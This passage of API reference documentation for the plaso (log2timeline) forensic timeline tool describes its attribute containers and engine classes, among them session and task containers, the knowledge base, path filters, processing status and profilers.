CONTAINER_TYPE = 'session_configuration'



class plaso.containers.sessions.SessionStart(identifier=None)Bases: plaso.containers.interface.AttributeContainer

Session start attribute container.


Type str

product_namename of the product that created the session for example “log2timeline”.

Type str

product_versionversion of the product that created the session.

Type str

timestamptime that the session was started. Contains the number of micro seconds since January 1, 1970, 00:00:00UTC.

Type int

CONTAINER_TYPE = 'session_start'

plaso.containers.shell_item_events module

Shell item event attribute container.

class plaso.containers.shell_item_events.ShellItemFileEntryEventDataBases: plaso.containers.events.EventData

Shell item file entry event data attribute container.

namename of the file entry shell item.

Type str

long_namelong name of the file entry shell item.

Type str

localized_namelocalized name of the file entry shell item.

Type str

file_referenceNTFS file reference, in the format: “MTF entry - sequence number”.

Type str

shell_item_pathshell item path.

Type str

originorigin of the event.



Type str

DATA_TYPE = 'windows:shell_item:file_entry'

plaso.containers.storage_media module

Storage media related attribute container definitions.

class plaso.containers.storage_media.MountPoint(mount_path=None,path_specification=None)

Bases: plaso.containers.interface.AttributeContainer

Mount point attribute container.

mount_pathpath where the path specification is mounted, such as “/mnt/image” or “C:”.

Type str


Type dfvfs.PathSpec

CONTAINER_TYPE = 'mount_point'

plaso.containers.tasks module

Task related attribute container definitions.

class plaso.containers.tasks.Task(session_identifier=None)Bases: plaso.containers.interface.AttributeContainer

Task attribute container.

A task describes a piece of work for a multi processing worker process for example a taks to process a pathspecification or to analyze an event.


Type bool

completion_timetime that the task was completed. Contains the number of micro seconds since January 1, 1970, 00:00:00UTC.

Type int

file_entry_typedfVFS type of the file entry the path specification is referencing.

Type str

has_retryTrue if the task was previously abandoned and a retry task was created, False otherwise.

Type bool

identifierunique identifier of the task.

Type str



last_processing_timethe last time the task was marked as being processed as number of milliseconds since January 1, 1970,00:00:00 UTC.

Type int

merge_prioritypriority used for the task storage file merge, where a lower value indicates a higher priority to merge.

Type int


Type dfvfs.PathSpec

session_identifierthe identifier of the session the task is part of.

Type str

start_timetime that the task was started. Contains the number of micro seconds since January 1, 1970, 00:00:00UTC.

Type int

storage_file_sizesize of the storage file in bytes.

Type int

storage_formatthe format the task results are to be stored in.

Type str

CONTAINER_TYPE = 'task'

CreateRetryTask()Creates a new task to retry a previously abandoned task.

The retry task will have a new identifier but most of the attributes will be a copy of the previously aban-doned task.

Returns a task to retry a previously abandoned task.

Return type Task

CreateTaskCompletion()Creates a task completion.

Returns task completion attribute container.

Return type TaskCompletion

CreateTaskStart()Creates a task start.

Returns task start attribute container.

Return type TaskStart

UpdateProcessingTime()Updates the processing time to now.



__lt__(other)Compares if the task attribute container is less than the other.

Parameters other (Task) – task attribute container to compare to.

Returns True if the task attribute container is less than the other.

Return type bool

class plaso.containers.tasks.TaskCompletion(identifier=None, session_identifier=None)Bases: plaso.containers.interface.AttributeContainer

Task completion attribute container.


Type bool


Type str


Type str

timestamptime that the task was completed. Contains the number of micro seconds since January 1, 1970, 00:00:00UTC.

Type int

CONTAINER_TYPE = 'task_completion'

class plaso.containers.tasks.TaskStart(identifier=None, session_identifier=None)Bases: plaso.containers.interface.AttributeContainer

Task start attribute container.


Type str


Type str

timestamptime that the task was started. Contains the number of micro seconds since January 1, 1970, 00:00:00UTC.

Type int

CONTAINER_TYPE = 'task_start'



plaso.containers.time_events module

Time-based event attribute containers.

class plaso.containers.time_events.DateTimeValuesEvent(date_time,date_time_description,time_zone=None)

Bases: plaso.containers.events.EventObject

dfDateTime date time values-based event attribute container.

date_timedate and time values.

Type dfdatetime.DateTimeValues

timestamptimestamp, which contains the number of microseconds since January 1, 1970, 00:00:00 UTC.

Type int

timestamp_descdescription of the meaning of the timestamp.

Type str

plaso.containers.warnings module

Warning attribute containers.

class plaso.containers.warnings.ExtractionError(message=None, parser_chain=None,path_spec=None)

Bases: plaso.containers.warnings.ExtractionWarning

Extraction error attribute container.

This class is provided for backwards compatiblity only, all new code must use ExtractionWarning.

messagewarning message.

Type str

parser_chainparser chain to which the warning applies.

Type str

path_specpath specification of the file entry to which the warning applies.

Type dfvfs.PathSpec

CONTAINER_TYPE = 'extraction_error'

class plaso.containers.warnings.ExtractionWarning(message=None,parser_chain=None,path_spec=None)


Extraction warning attribute container.

Extraction warnings are produced by parsers/plugins as well the Plaso engine when they encounter situationsthat should be brought to the users’ attention but are not events derived from the data being processed.



messagewarning message.

Type str

parser_chainparser chain to which the warning applies.

Type str

path_specpath specification of the file entry to which the warning applies.

Type dfvfs.PathSpec

CONTAINER_TYPE = 'extraction_warning'

plaso.containers.windows_events module

Windows event data attribute containers.

class plaso.containers.windows_events.WindowsDistributedLinkTrackingEventData(uuid,ori-gin)

Bases: plaso.containers.events.EventData

Windows distributed link event data attribute container.

mac_addressMAC address stored in the UUID.

Type str

originorigin of the event (event source). E.g. the path of the corresponding LNK file or file reference MFT entrywith the corresponding NTFS $OBJECT_ID attribute.

Type str

uuidUUID.

Type str

DATA_TYPE = 'windows:distributed_link_tracking:creation'

class plaso.containers.windows_events.WindowsRegistryEventDataBases: plaso.containers.events.EventData

Windows Registry event data attribute container.

key_pathWindows Registry key path.

Type str

valuesnames and data of the values in the key.

Type str

DATA_TYPE = 'windows:registry:key_value'



class plaso.containers.windows_events.WindowsVolumeEventDataBases: plaso.containers.events.EventData

Windows volume event data attribute container.

device_pathvolume device path.

Type str

originorigin of the event (event source), for example the corresponding Prefetch file name.

Type str

serial_numbervolume serial number.

Type str

DATA_TYPE = 'windows:volume:creation'

Module contents

This file imports Python modules that register attribute container types.

5.1.5 plaso.engine package

Submodules

plaso.engine.artifact_filters module

Helper to create filters based on forensic artifact definitions.

class plaso.engine.artifact_filters.ArtifactDefinitionsFiltersHelper(artifacts_registry,knowl-edge_base)

Bases: plaso.engine.filters_helper.CollectionFiltersHelper

Helper to create collection filters based on artifact definitions.

Builds collection filters from forensic artifact definitions.

For more information about Forensic Artifacts see: https://github.com/ForensicArtifacts/artifacts/blob/master/docs/Artifacts%20definition%20format%20and%20style%20guide.asciidoc

file_system_artifact_namesnames of artifacts definitions that generated file system find specifications.

Type set[str]

registry_artifact_namesnames of artifacts definitions that generated Windows Registry find specifications.

Type set[str]

BuildFindSpecs(artifact_filter_names, environment_variables=None)Builds find specifications from artifact definitions.

Parameters


https://github.com/ForensicArtifacts/artifacts/blob/master/docs/Artifacts%20definition%20format%20and%20style%20guide.asciidoc

https://github.com/ForensicArtifacts/artifacts/blob/master/docs/Artifacts%20definition%20format%20and%20style%20guide.asciidoc


• artifact_filter_names (list[str]) – names of artifact definitions that areused for filtering file system and Windows Registry key paths.

• environment_variables (Optional[list[EnvironmentVariableArtifact]])– environment variables.

classmethod CheckKeyCompatibility(key_path)Checks if a Windows Registry key path is supported by dfWinReg.

Parameters key_path (str) – path of the Windows Registry key.

Returns True if key is compatible or False if not.

Return type bool

plaso.engine.configurations module

Processing configuration classes.

class plaso.engine.configurations.CredentialConfiguration(credential_data=None,credential_type=None,path_spec=None)


Configuration settings for a credential.

credential_datacredential data.

Type bytes

credential_typecredential type.

Type str


Type dfvfs.PathSpec

CONTAINER_TYPE = 'credential_configuration'

class plaso.engine.configurations.EventExtractionConfigurationBases: plaso.containers.interface.AttributeContainer

Configuration settings for event extraction.

These settings are primarily used by the parser mediator.

filter_objectfilter that specifies which events to include.

Type objectfilter.Filter

CONTAINER_TYPE = 'event_extraction_configuration'

class plaso.engine.configurations.ExtractionConfigurationBases: plaso.containers.interface.AttributeContainer

Configuration settings for extraction.

These settings are primarily used by the extraction worker.



hasher_file_size_limitmaximum file size that hashers should process, where 0 or None represents unlimited.

Type int

hasher_names_stringcomma separated string of names of hashers to use during processing.

Type str

process_archivesTrue if archive files should be scanned for file entries.

Type bool

process_compressed_streamsTrue if file content in compressed streams should be processed.

Type bool

yara_rules_stringYara rule definitions.

Type str

CONTAINER_TYPE = 'extraction_configuration'

class plaso.engine.configurations.ProcessingConfigurationBases: plaso.containers.interface.AttributeContainer

Configuration settings for processing.

artifact_filtersnames of artifact definitions that are used for filtering file system and Windows Registry key paths.

Type Optional list[str]

credentialscredential configurations.

Type list[CredentialConfiguration]

data_locationpath to the data files.

Type str

debug_outputTrue if debug output should be enabled.

Type bool

event_extractionevent extraction configuration.

Type EventExtractionConfiguration

extractionextraction configuration.

Type ExtractionConfiguration


Type str



log_filenamename of the log file.

Type str

parser_filter_expressionparser filter expression, where None represents all parsers and plugins.

Type str

preferred_yearpreferred initial year value for year-less date and time values.

Type int

profilingprofiling configuration.

Type ProfilingConfiguration

task_storage_formatformat to use for storing task results.

Type str

temporary_directorypath of the directory for temporary files.

Type str

CONTAINER_TYPE = 'processing_configuration'

class plaso.engine.configurations.ProfilingConfigurationBases: plaso.containers.interface.AttributeContainer

Configuration settings for profiling.

directorypath to the directory where the profiling sample files should be stored.

Type str

profilersnames of the profilers to enable. Supported profilers are:

• ‘memory’, which profiles memory usage;

• ‘parsers’, which profiles CPU time consumed by individual parsers;

• ‘processing’, which profiles CPU time consumed by different parts of processing;

• ‘serializers’, which profiles CPU time consumed by individual serializers.

• ‘storage’, which profiles storage reads and writes.

Type set(str)

sample_ratethe profiling sample rate. Contains the number of event sources processed.

Type int

CONTAINER_TYPE = 'profiling_configuration'

HaveProfileAnalyzers()Determines if analyzers profiling is configured.



Returns True if analyzers profiling is configured.

Return type bool

HaveProfileMemory()Determines if memory profiling is configured.

Returns True if memory profiling is configured.

Return type bool

HaveProfileParsers()Determines if parsers profiling is configured.

Returns True if parsers profiling is configured.

Return type bool

HaveProfileProcessing()Determines if processing profiling is configured.

Returns True if processing profiling is configured.

Return type bool

HaveProfileSerializers()Determines if serializers profiling is configured.

Returns True if serializers profiling is configured.

Return type bool

HaveProfileStorage()Determines if storage profiling is configured.

Returns True if storage profiling is configured.

Return type bool

HaveProfileTaskQueue()Determines if task queue profiling is configured.

Returns True if task queue profiling is configured.

Return type bool

HaveProfileTasks()Determines if tasks profiling is configured.

Returns True if task queue profiling is configured.

Return type bool

plaso.engine.engine module

The processing engine.

class plaso.engine.engine.BaseEngineBases: object

Processing engine interface.

collection_filters_helpercollection filters helper.

Type CollectionFiltersHelper



knowledge_baseknowledge base.

Type KnowledgeBase

classmethod BuildArtifactsRegistry(artifact_definitions_path, custom_artifacts_path)Build Find Specs from artifacts or filter file if available.

Parameters

• artifact_definitions_path (str) – path to artifact definitions file.

• custom_artifacts_path (str) – path to custom artifact definitions file.

Returns artifact definitions registry.

Return type artifacts.ArtifactDefinitionsRegistry

Raises BadConfigOption – if artifact definitions cannot be read.

BuildCollectionFilters(artifact_definitions_path, custom_artifacts_path, knowl-edge_base_object, artifact_filter_names=None, fil-ter_file_path=None)

Builds collection filters from artifacts or filter file if available.

Parameters

• artifact_definitions_path (str) – path to artifact definitions file.

• custom_artifacts_path (str) – path to custom artifact definitions file.

• knowledge_base_object (KnowledgeBase) – knowledge base.

• artifact_filter_names (Optional[list[str]]) – names of artifact defini-tions that are used for filtering file system and Windows Registry key paths.

• filter_file_path (Optional[str]) – path of filter file.

Raises InvalidFilter – if no valid file system find specifications are built.

classmethod CreateSession(artifact_filter_names=None, command_line_arguments=None,debug_mode=False, filter_file_path=None,preferred_encoding='utf-8', preferred_time_zone=None, pre-ferred_year=None, text_prepend=None)

Creates a session attribute container.

Parameters

• artifact_filter_names (Optional[list[str]]) – names of artifact defini-tions that are used for filtering file system and Windows Registry key paths.

• command_line_arguments (Optional[str]) – the command line arguments.

• debug_mode (bool) – True if debug mode was enabled.

• filter_file_path (Optional[str]) – path to a file with find specifications.

• preferred_encoding (Optional[str]) – preferred encoding.

• preferred_time_zone (Optional[str]) – preferred time zone.

• preferred_year (Optional[int]) – preferred year.

• text_prepend (Optional[str]) – text to prepend to every display name.

Returns session attribute container.

Return type Session



GetSourceFileSystem(source_path_spec, resolver_context=None)Retrieves the file system of the source.

Parameters

• source_path_spec (dfvfs.PathSpec) – path specifications of the sources to pro-cess.

• resolver_context (dfvfs.Context) – resolver context.

Returns

containing:

dfvfs.FileSystem: file system path.PathSpec: mount point path specification. Themount point path

specification refers to either a directory or a volume on a storage media device orimage. It is needed by the dfVFS file system searcher (FileSystemSearcher) toindicate the base location of the file system.

Return type tuple

Raises RuntimeError – if source file system path specification is not set.

PreprocessSources(artifacts_registry_object, source_path_specs, resolver_context=None)Preprocesses the sources.

Parameters

• artifacts_registry_object (artifacts.ArtifactDefinitionsRegistry)– artifact definitions registry.

• source_path_specs (list[dfvfs.PathSpec]) – path specifications of thesources to process.

• resolver_context (Optional[dfvfs.Context]) – resolver context.

plaso.engine.extractors module

The extractor class definitions.

An extractor is a class used to extract information from “raw” data.

class plaso.engine.extractors.EventExtractor(parser_filter_expression=None)Bases: object

Event extractor.

An event extractor extracts events from event sources.

ParseDataStream(parser_mediator, file_entry, data_stream_name)Parses a data stream of a file entry with the enabled parsers.

Parameters

• parser_mediator (ParserMediator) – parser mediator.

• file_entry (dfvfs.FileEntry) – file entry.

• data_stream_name (str) – data stream name.

Raises RuntimeError – if the file-like object or the parser object is missing.

ParseFileEntryMetadata(parser_mediator, file_entry)Parses the file entry metadata such as file system data.



Parameters



ParseMetadataFile(parser_mediator, file_entry, data_stream_name)Parses a metadata file.

Parameters



• data_stream_name (str) – data stream name.

class plaso.engine.extractors.PathSpecExtractorBases: object

Path specification extractor.

A path specification extractor extracts path specification from a source directory, file or storage media device orimage.

ExtractPathSpecs(path_specs, find_specs=None, recurse_file_system=True, re-solver_context=None)

Extracts path specification from a specific source.

Parameters

• path_specs (Optional[list[dfvfs.PathSpec]]) – path specifications.

• find_specs (Optional[list[dfvfs.FindSpec]]) – find specifications usedin path specification extraction.

• recurse_file_system (Optional[bool]) – True if extraction should recurseinto a file system.

• resolver_context (Optional[dfvfs.Context]) – resolver context.

Yields dfvfs.PathSpec – path specification of a file entry found in the source.

plaso.engine.filter_file module

Filter file.

class plaso.engine.filter_file.FilterFileBases: object

Filter file.

A filter file contains one or more path filters.

A path filter may contain path expansion attributes. Such an attribute is defined as anything within a curlybracket, for example “System{my_attribute}PathKeyname”. If the attribute “my_attribute” is defined its runtimevalue will be replaced with placeholder in the path filter such as “SystemMyValuePathKeyname”.

If the path filter needs to have curly brackets in the path then these need to be escaped with another curly bracket,for example “System{my_attribute}{{123-AF25-E523}}KeyName”, where “{{123-AF25-E523}}” will be re-placed with “{123-AF25-E523}” at runtime.

ReadFromFile(path)Reads the path filters from the filter file.



Parameters path (str) – path to a filter file.

Returns path filters.

Return type list[PathFilter]

plaso.engine.filters_helper module

Collection filters helper.

class plaso.engine.filters_helper.CollectionFiltersHelperBases: object

Helper for collection filters.

excluded_file_system_find_specsfile system find specifications of paths to exclude from the collection.

Type list[dfvfs.FindSpec]

included_file_system_find_specsfile system find specifications of paths to include in the collection.

Type list[dfvfs.FindSpec]

registry_find_specsWindows Registry find specifications.

Type list[dfwinreg.FindSpec]

plaso.engine.knowledge_base module

The artifact knowledge base object.

The knowledge base is filled by user provided input and the pre-processing phase. It is intended to provide successivephases, like the parsing and analysis phases, with essential information like the timezone and codepage of the sourcedata.

class plaso.engine.knowledge_base.KnowledgeBaseBases: object

The knowledge base.

AddAvailableTimeZone(time_zone, session_identifier=None)Adds an available time zone.

Parameters

• time_zone (TimeZoneArtifact) – time zone artifact.

• session_identifier (Optional[str])) – session identifier, where None repre-sents the active session.

Raises KeyError – if the time zone already exists.

AddEnvironmentVariable(environment_variable)Adds an environment variable.

Parameters environment_variable (EnvironmentVariableArtifact) – envi-ronment variable artifact.

Raises KeyError – if the environment variable already exists.



AddUserAccount(user_account, session_identifier=None)Adds an user account.

Parameters

• user_account (UserAccountArtifact) – user account artifact.


Raises KeyError – if the user account already exists.

GetEnvironmentVariable(name)Retrieves an environment variable.

Parameters name (str) – name of the environment variable.

Returns

environment variable artifact or None if there was no value set for the given name.

Return type EnvironmentVariableArtifact

GetEnvironmentVariables()Retrieves the environment variables.

Returns environment variable artifacts.

Return type list[EnvironmentVariableArtifact]

GetHostname(session_identifier=None)Retrieves the hostname related to the event.

If the hostname is not stored in the event it is determined based on the preprocessing information that isstored inside the storage file.

Parameters session_identifier (Optional[str])) – session identifier, where Nonerepresents the active session.

Returns hostname.

Return type str

GetMountPath()Retrieves the mount path of the source.

Returns mount path of the source or None if not set.

Return type str

GetSourceConfigurationArtifacts(session_identifier=None)Retrieves the knowledge base as a source configuration artifacts.

Parameters session_identifier (Optional[str])) – session identifier, where Nonerepresents the active session.

Returns source configuration artifacts.

Return type list[SourceConfigurationArtifact]

GetTextPrepend()Retrieves the text to prepend to the display name.

Returns text to prepend to the display name or None if not set.

Return type str



GetUsernameByIdentifier(user_identifier, session_identifier=None)Retrieves the username based on an user identifier.

Parameters

• user_identifier (str) – user identifier, either a UID or SID.


Returns username.

Return type str

GetUsernameForPath(path)Retrieves a username for a specific path.

This is determining if a specific path is within a user’s directory and returning the username of the user ifso.

Parameters path (str) – path.

Returns

username or None if the path does not appear to be within a user’s directory.

Return type str

GetValue(identifier, default_value=None)Retrieves a value by identifier.

Parameters

• identifier (str) – case insensitive unique identifier for the value.

• default_value (object) – default value.

Returns value or default value if not available.

Return type object

Raises TypeError – if the identifier is not a string type.

HasUserAccounts()Determines if the knowledge base contains user accounts.

Returns True if the knowledge base contains user accounts.

Return type bool

ReadSystemConfigurationArtifact(system_configuration, session_identifier=None)Reads the knowledge base values from a system configuration artifact.

Note that this overwrites existing values in the knowledge base.

Parameters

• system_configuration (SystemConfigurationArtifact) – system config-uration artifact.


SetActiveSession(session_identifier)Sets the active session.

Parameters session_identifier (str) – session identifier where None represents thedefault active session.



SetCodepage(codepage)Sets the codepage.

Parameters codepage (str) – codepage.

Raises ValueError – if the codepage is not supported.

SetEnvironmentVariable(environment_variable)Sets an environment variable.

Parameters environment_variable (EnvironmentVariableArtifact) – envi-ronment variable artifact.

SetHostname(hostname, session_identifier=None)Sets a hostname.

Parameters

• hostname (HostnameArtifact) – hostname artifact.


SetMountPath(mount_path)Sets the text to prepend to the display name.

Parameters mount_path (str) – mount path of the source or None if the source is not amounted onto a directory.

SetTextPrepend(text_prepend)Sets the text to prepend to the display name.

Parameters text_prepend (str) – text to prepend to the display name or None if no textshould be prepended.

SetTimeZone(time_zone)Sets the time zone.

Parameters time_zone (str) – time zone.

Raises ValueError – if the timezone is not supported.

SetValue(identifier, value)Sets a value by identifier.

Parameters

• identifier (str) – case insensitive unique identifier for the value.

• value (object) – value.

Raises TypeError – if the identifier is not a string type.

property available_time_zonesavailable time zones of the current session.

Type list[TimeZone]

property codepagecodepage of the current session.

Type str

property hostnamehostname of the current session.

Type str



property timezonetimezone of the current session.

Type datetime.tzinfo

property user_accountsuser accounts of the current session.

Type list[UserAccountArtifact]

property yearyear of the current session.

Type int

plaso.engine.logger module

The engine sub module logger.

plaso.engine.path_filters module

Path filters.

Path filters are specified in filter files and are used during collection to include or exclude file system paths.

class plaso.engine.path_filters.PathCollectionFiltersHelperBases: plaso.engine.filters_helper.CollectionFiltersHelper

Path collection filters helper.

BuildFindSpecs(path_filters, environment_variables=None)Builds find specifications from path filters.

Parameters

• path_filters (list[PathFilter]) – path filters.

• environment_variables (Optional[list[EnvironmentVariableArtifact]])– environment variables.

class plaso.engine.path_filters.PathFilter(filter_type, description=None,path_separator='/', paths=None)

Bases: object

Path filter.

descriptiondescription of the purpose of the filter or None if not set.

Type str

filter_typeindicates if the filter should include or excludes paths during collection.

Type str

path_separatorpath segment separator.

Type str

pathspaths to filter.



Type list[str]

FILTER_TYPE_EXCLUDE = 'exclude'

FILTER_TYPE_INCLUDE = 'include'

plaso.engine.path_helper module

The path helper.

class plaso.engine.path_helper.PathHelperBases: object

Class that implements the path helper.

classmethod ExpandGlobStars(path, path_separator)Expands globstars “**” in a path.

A globstar “**” will recursively match all files and zero or more directories and subdirectories.

By default the maximum recursion depth is 10 subdirectories, a numeric values after the globstar, such as“**5”, can be used to define the maximum recursion depth.

Parameters

• path (str) – path to be expanded.

• path_separator (str) – path segment separator.

Returns String path expanded for each glob.


classmethod ExpandUsersVariablePath(path, path_separator, user_accounts)Expands a path with a users variable, such as %%users.homedir%%.

Parameters

• path (str) – path with users variable.

• path_separator (str) – path segment separator.

• user_accounts (list[UserAccountArtifact]) – user accounts.

Returns paths for which the users variables have been expanded.


classmethod ExpandWindowsPath(path, environment_variables)Expands a Windows path containing environment variables.

Parameters

• path (str) – Windows path with environment variables.

• environment_variables (list[EnvironmentVariableArtifact]) – en-vironment variables.

Returns expanded Windows path.

Return type str

classmethod ExpandWindowsPathSegments(path_segments, environment_variables)Expands a Windows path segments containing environment variables.

Parameters



• path_segments (list[str]) – Windows path segments with environment variables.

• environment_variables (list[EnvironmentVariableArtifact]) – en-vironment variables.

Returns expanded Windows path segments.


classmethod GetDisplayNameForPathSpec(path_spec, mount_path=None,text_prepend=None)

Retrieves the display name of a path specification.

Parameters

• path_spec (dfvfs.PathSpec) – path specification.

• mount_path (Optional[str]) – path where the file system that is used by the pathspecification is mounted, such as “/mnt/image”. The mount path will be stripped from theabsolute path defined by the path specification.

• text_prepend (Optional[str]) – text to prepend.

Returns

human readable version of the path specification or None if no path specification wasprovided.

Return type str

classmethod GetRelativePathForPathSpec(path_spec, mount_path=None)Retrieves the relative path of a path specification.

If a mount path is defined the path will be relative to the mount point, otherwise the path is relative to theroot of the file system that is used by the path specification.

Parameters


• mount_path (Optional[str]) – path where the file system that is used by the pathspecification is mounted, such as “/mnt/image”. The mount path will be stripped from theabsolute path defined by the path specification.

Returns relative path or None.

Return type str

plaso.engine.plaso_queue module

Queue management implementation for Plaso.

This file contains an implementation of a queue used by plaso for queue management.

The queue has been abstracted in order to provide support for different implementations of the queueing mechanism,to support multi processing and scalability.

class plaso.engine.plaso_queue.QueueBases: object

Class that implements the queue interface.

abstract Close(abort=False)Closes the queue.



Parameters abort (Optional[bool]) – whether the Close is the result of an abort condi-tion. If True, queue contents may be lost.

abstract IsEmpty()Determines if the queue is empty.

abstract Open()Opens the queue, ready to enqueue or dequeue items.

abstract PopItem()Pops an item off the queue.

Raises QueueEmpty – when the queue is empty.

abstract PushItem(item, block=True)Pushes an item onto the queue.

Parameters

• item (object) – item to add.

• block (bool) – whether to block if the queue is full.

Raises QueueFull – if the queue is full, and the item could not be added.

class plaso.engine.plaso_queue.QueueAbortBases: object

Class that implements a queue abort.

plaso.engine.process_info module

Information about running process.

class plaso.engine.process_info.ProcessInfo(pid)Bases: object

Provides information about a running process.

GetUsedMemory()Retrieves the amount of memory used by the process.

Returns

amount of memory in bytes used by the process or None if not available.

Return type int

plaso.engine.processing_status module

Processing status classes.

class plaso.engine.processing_status.EventsStatusBases: object

The status of the events.

number_of_duplicate_eventsnumber of duplicate events, not including the original.

Type int

number_of_events_from_time_slicenumber of events from time slice.



Type int

number_of_filtered_eventsnumber of events excluded by the event filter.

Type int

number_of_macb_grouped_eventsnumber of events grouped based on MACB.

Type int

total_number_of_eventstotal number of events in the storage file.

Type int

class plaso.engine.processing_status.ProcessStatusBases: object

The status of an individual process.

display_namehuman readable of the file entry currently being processed by the process.

Type str

identifierprocess identifier.

Type str

last_running_timetimestamp of the last update when the process had a running process status.

Type int

number_of_consumed_event_tagstotal number of event tags consumed by the process.

Type int

number_of_consumed_event_tags_deltanumber of event tags consumed by the process since the last status update.

Type int

number_of_consumed_eventstotal number of events consumed by the process.

Type int

number_of_consumed_events_deltanumber of events consumed by the process since the last status update.

Type int

number_of_consumed_reportstotal number of event reports consumed by the process.

Type int

number_of_consumed_reports_deltanumber of event reports consumed by the process since the last status update.

Type int



number_of_consumed_sourcestotal number of event sources consumed by the process.

Type int

number_of_consumed_sources_deltanumber of event sources consumed by the process since the last status update.

Type int

number_of_consumed_warningstotal number of warnings consumed by the process.

Type int

number_of_consumed_warnings_deltanumber of warnings consumed by the process since the last status update.

Type int

number_of_produced_event_tagstotal number of event tags produced by the process.

Type int

number_of_produced_event_tags_deltanumber of event tags produced by the process since the last status update.

Type int

number_of_produced_eventstotal number of events produced by the process.

Type int

number_of_produced_events_deltanumber of events produced by the process since the last status update.

Type int

number_of_produced_reportstotal number of event reports produced by the process.

Type int

number_of_produced_reports_deltanumber of event reports produced by the process since the last status update.

Type int

number_of_produced_sourcestotal number of event sources produced by the process.

Type int

number_of_produced_sources_deltanumber of event sources produced by the process since the last status update.

Type int

number_of_produced_warningstotal number of warnings produced by the process.

Type int

number_of_produced_warnings_deltanumber of warnings produced by the process since the last status update.



Type int

pidprocess identifier (PID).

Type int

statushuman readable status indication such as “Hashing” or “Idle”.

Type str

used_memorysize of used memory in bytes.

Type int

UpdateNumberOfEventReports(number_of_consumed_reports, number_of_produced_reports)Updates the number of event reports.

Parameters

• number_of_consumed_reports (int) – total number of event reports consumedby the process.

• number_of_produced_reports (int) – total number of event reports produced bythe process.

Returns True if either number of event reports has increased.

Return type bool

Raises ValueError – if the consumed or produced number of event reports is smaller thanthe value of the previous update.

UpdateNumberOfEventSources(number_of_consumed_sources, number_of_produced_sources)Updates the number of event sources.

Parameters

• number_of_consumed_sources (int) – total number of event sources consumedby the process.

• number_of_produced_sources (int) – total number of event sources producedby the process.

Returns True if either number of event sources has increased.

Return type bool

Raises ValueError – if the consumed or produced number of event sources is smaller thanthe value of the previous update.

UpdateNumberOfEventTags(number_of_consumed_event_tags, num-ber_of_produced_event_tags)

Updates the number of event tags.

Parameters

• number_of_consumed_event_tags (int) – total number of event tags consumedby the process.

• number_of_produced_event_tags (int) – total number of event tags producedby the process.

Returns True if either number of event tags has increased.



Return type bool

Raises ValueError – if the consumed or produced number of event tags is smaller than thevalue of the previous update.

UpdateNumberOfEvents(number_of_consumed_events, number_of_produced_events)Updates the number of events.

Parameters

• number_of_consumed_events (int) – total number of events consumed by theprocess.

• number_of_produced_events (int) – total number of events produced by the pro-cess.

Returns True if either number of events has increased.

Return type bool

Raises ValueError – if the consumed or produced number of events is smaller than the valueof the previous update.

UpdateNumberOfWarnings(number_of_consumed_warnings, number_of_produced_warnings)Updates the number of warnings.

Parameters

• number_of_consumed_warnings (int) – total number of warnings consumed bythe process.

• number_of_produced_warnings (int) – total number of warnings produced bythe process.

Returns True if either number of warnings has increased.

Return type bool

Raises ValueError – if the consumed or produced number of warnings is smaller than thevalue of the previous update.

class plaso.engine.processing_status.ProcessingStatusBases: object

The status of the overall extraction process (processing).

abortedTrue if processing was aborted.

Type bool

error_path_specspath specifications that caused critical errors during processing.

Type list[dfvfs.PathSpec]

events_statusstatus information about events.

Type EventsStatus

foreman_statusforeman processing status.

Type ProcessingStatus



start_timetime that the processing was started. Contains the number of micro seconds since January 1, 1970,00:00:00 UTC.

Type float

tasks_statusstatus information about tasks.

Type TasksStatus

UpdateEventsStatus(events_status)Updates the events status.

Parameters events_status (EventsStatus) – status information about events.

UpdateForemanStatus(identifier, status, pid, used_memory, display_name, num-ber_of_consumed_sources, number_of_produced_sources, num-ber_of_consumed_events, number_of_produced_events, num-ber_of_consumed_event_tags, number_of_produced_event_tags,number_of_consumed_reports, number_of_produced_reports, num-ber_of_consumed_warnings, number_of_produced_warnings)

Updates the status of the foreman.

Parameters

• identifier (str) – foreman identifier.

• status (str) – human readable status indication such as “Hashing” or “Idle”.

• pid (int) – process identifier (PID).

• used_memory (int) – size of used memory in bytes.

• display_name (str) – human readable of the file entry currently being processed bythe foreman.

• number_of_consumed_sources (int) – total number of event sources consumedby the foreman.

• number_of_produced_sources (int) – total number of event sources producedby the foreman.

• number_of_consumed_events (int) – total number of events consumed by theforeman.

• number_of_produced_events (int) – total number of events produced by theforeman.

• number_of_consumed_event_tags (int) – total number of event tags consumedby the foreman.

• number_of_produced_event_tags (int) – total number of event tags producedby the foreman.

• number_of_consumed_warnings (int) – total number of warnings consumed bythe foreman.

• number_of_produced_warnings (int) – total number of warnings produced bythe foreman.





UpdateTasksStatus(tasks_status)Updates the tasks status.

Parameters tasks_status (TasksStatus) – status information about tasks.

UpdateWorkerStatus(identifier, status, pid, used_memory, display_name, num-ber_of_consumed_sources, number_of_produced_sources, num-ber_of_consumed_events, number_of_produced_events, num-ber_of_consumed_event_tags, number_of_produced_event_tags,number_of_consumed_reports, number_of_produced_reports, num-ber_of_consumed_warnings, number_of_produced_warnings)

Updates the status of a worker.

Parameters

• identifier (str) – worker identifier.

• status (str) – human readable status indication such as “Hashing” or “Idle”.

• pid (int) – process identifier (PID).

• used_memory (int) – size of used memory in bytes.

• display_name (str) – human readable of the file entry currently being processed bythe worker.

• number_of_consumed_sources (int) – total number of event sources consumedby the worker.

• number_of_produced_sources (int) – total number of event sources producedby the worker.

• number_of_consumed_events (int) – total number of events consumed by theworker.

• number_of_produced_events (int) – total number of events produced by theworker.

• number_of_consumed_event_tags (int) – total number of event tags consumedby the worker.

• number_of_produced_event_tags (int) – total number of event tags producedby the worker.



• number_of_consumed_warnings (int) – total number of warnings consumed bythe worker.

• number_of_produced_warnings (int) – total number of warnings produced bythe worker.

property workers_statusThe worker status objects sorted by identifier.

class plaso.engine.processing_status.TasksStatusBases: object



The status of the tasks.

number_of_abandoned_tasksnumber of abandoned tasks.

Type int

number_of_queued_tasksnumber of active tasks.

Type int

number_of_tasks_pending_mergenumber of tasks pending merge.

Type int

number_of_tasks_processingnumber of tasks processing.

Type int

total_number_of_taskstotal number of tasks.

Type int

plaso.engine.profilers module

The profiler classes.

class plaso.engine.profilers.AnalyzersProfiler(identifier, configuration)Bases: plaso.engine.profilers.CPUTimeProfiler

The analyzers profiler.

class plaso.engine.profilers.CPUTimeMeasurementBases: object

The CPU time measurement.

start_sample_timestart sample time or None if not set.

Type float

total_cpu_timetotal CPU time or None if not set.

Type float

SampleStart()Starts measuring the CPU time.

SampleStop()Stops measuring the CPU time.

class plaso.engine.profilers.CPUTimeProfiler(identifier, configuration)Bases: plaso.engine.profilers.SampleFileProfiler

The CPU time profiler.

